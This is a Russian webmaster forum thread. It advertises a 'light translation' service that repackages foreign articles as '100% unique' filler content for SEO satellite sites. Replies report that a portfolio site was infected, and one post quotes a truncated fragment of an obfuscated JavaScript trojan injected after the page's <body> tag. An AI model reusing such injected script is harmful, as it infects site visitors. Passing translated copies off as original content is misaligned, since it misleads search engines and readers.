заказчики пищат от удовольствия - новая услуга наполнения СДЛ: лайт-переводы

12
ETNO
На сайте с 16.06.2008
Offline
117
1025

В связи с очередным расширением штата, предлагаем новую услугу по изготовлению и наполнения сателлитов, контент-проектов.

Лайт-переводы

В чём собственно услуга? Вы даете нам тему для текста- мы сами ищем текст на западных источниках, делаем лайт-перевод, отдаем вам текст и фото(по желанию). В итоге вы получаете почти что копирайт + 100 % уникальность + оригинальность по цене обычного рерайта.

Стоимость пока что 1.2 у.е за 1000 без пробелов + картинка. Спешите, пока есть такая возможность.

В чем наши преимущества перед подобными биржами? Мы сами ищем текст, дешевле, вы работаете конкретно с человеком, а не автоматической машиной.

Ну и конечно мы готовы сделать СДЛ сателлиты, которые не стыдно показать и народу и Яндексу. Парочку новых интересных работ выложили на наш сайт

Wordpress тема для заработка на партнерках (http://themeforest.net/item/rehub-directory-shop-coupon-affiliate-theme/7646339). Создание каталогов с фильтрацией, расширенный функционал обзоров, layout builder, еженедельное обновление.
Barkoff
На сайте с 17.09.2007
Offline
27
#1

Лайт - это как? Гуглем?

Дизайн сайтов, вёрстка, создание сайтов «под ключ», удалённое сопровождение (http://deworks.ru/)
Портфолио (http://www.free-lance.ru/users/Deworks)
ETNO
На сайте с 16.06.2008
Offline
117
#2

Лайт - это перевод в ручную. Но текст не будет на все 100 копировать оригинал. Т.е. как технический перевод - это не пойдёт, но как заполнение сайта - 100% качество и уникальность.

BrokenBrake
На сайте с 03.03.2007
Offline
194
#3

А обратный перевод возможен? + Рерайт с английского на английский.

S
На сайте с 16.05.2008
Offline
4
#4

это же лайт-перевод

ETNO
На сайте с 16.06.2008
Offline
117
#5

услуга - обратный перевод будет только с сентября(переводчик уехала в отпуск).

Сейчас только англ-рус.

SotEX
На сайте с 14.04.2007
Offline
86
#6
ETNO:
Парочку новых интересных работ выложили на наш сайт

Зашёл я на ваш сайт, решил глянуть ваше портфолио, а каспер запищал от удовольствия(не ходите по ссылке, там вирь)... Минус вам.!

Бесплатный мониторинг размещенных статей (/ru/forum/438989)
ETNO
На сайте с 16.06.2008
Offline
117
#7
SotEX:
Зашёл я на ваш сайт, решил глянуть ваше портфолио, а каспер запищал от удовольствия(не ходите по ссылке, там вирь)... Минус вам.!

Во-первых, мой сайт www.rutool.com и именно на него я указывал ссылку. Сайт, который вы указали, а именно www.creologic.co.uk, что находится в моем портфолио - делал Я, но принадлежит он не мне. Я не отвечаю за хостинг клиентов, хотя уверен, что ничего они туда не кидали. К тому же проверил все файлы - никакого лишнего кода не увидел.

Во-вторых, только что заходил на этот сайт. Никаких вирусов ESET NOD с последней базой сигнатур - НЕ обнаружил.

Если там действительно вирь - укажите его имя, пожайлуста. Я передам его владельцу сайта. Если же этого не сделаете - вывод напрашивается сам собой.

Интересно, у вас всегда принято за все кидать минусы? Очень красиво, вместо того, чтобы указать - нужно сразу в минуса.😒

F1
На сайте с 22.05.2007
Offline
95
#8

сразу после тега <body> смотрите <script>function v483e3900c2c49(v483e3900c3045){ var v483e3900c3442=16; ... 2F5343524950543E'));</script>

DocWeb
На сайте с 23.04.2007
Offline
101
#9

2 ETNO

обнаружено: троянская программа Trojan-Clicker.JS.Agent.h

URL: http://www.creologic.co.uk/

на связи, практически онлайн. почта для связи - dlya-svyazi @ list.ru °¤•Џ•¤° Бери ношу по себе, чтоб не падать при ходьбе (с) "Брат"
ETNO
На сайте с 16.06.2008
Offline
117
#10

да, действительно есть. Сказал владельцу - он почистил. Такой прикол был только в index.html

Самое интересное, что проверял и dr.web - тоже ничего. А я только вчера сменил Каспера на НОД, потому что каспер не все вирусы видел. Прийдётся опять менять.

Cообщение владельцу передал. Будут разбираться. Если кто сталкивался с подобной проблемой - ткните носом в топик, если уже обсуждалось.

ETNO добавил 06.07.2008 в 18:25

Fr13nd, DocWeb - спасибо большое.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий